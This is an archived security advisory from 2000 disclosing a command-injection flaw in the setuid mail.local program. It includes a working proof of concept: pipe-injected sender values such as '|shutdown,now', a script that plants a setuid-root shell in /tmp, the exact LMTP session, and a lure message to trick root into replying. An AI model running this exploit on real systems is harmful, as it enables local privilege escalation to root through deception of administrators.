[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : vulnerability in mail.local

Title: vulnerability in mail.local
Released by: Gregory Duchemin
Date: 1st November 2000
Printable version: Click here

mail.local is a little setuid root prog designed, like its name suggest, for

local mail delivering.

Used with the -l option, we have an interactive mode in lmtp protocol (

simplified smtp for local mail delivery only )

A weakness exists in the 'mail from' field that allow any local user to

insert a piped shell command that may be executed

by the recipient when he does a reply with the  mail command. A little

social engineering skill should help to root the boxe.

Finally, mail.local shouldn't allow such escape chars even in the mail from

field and the command mail shouldn't allow such

a reply through a pipe.

A space char in the command will finish the string, so either u use a single

command like '|reboot' or use a comma that should

be converted in space by mail.

eg: '|shutdown,now'

Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is

vulnerable to this pb.

That looks like the old sendmail bugs



#cat exploit


cp /bin/sh /tmp/newsh

chmod a+rws /tmp/newsh


#id=666(c3rb3r) gid=100(user)


#cp exploit /tmp/@hotmail.com

#chmod a+x /tmp/@hotmail.com

#mail.local -l


mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil


rcpt to:


Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?






(now wait for a reply and then, )

#ls /tmp





#id=0(root) gid=0(root)

#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With


Have a nice day,

Gregory Duchemin

Security consultant

1001 bd Maisonneuve Ouest, suite 200

Montreal (Quebec) H3A 3C8 CANADA



Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at


(C) 1999-2000 All rights reserved.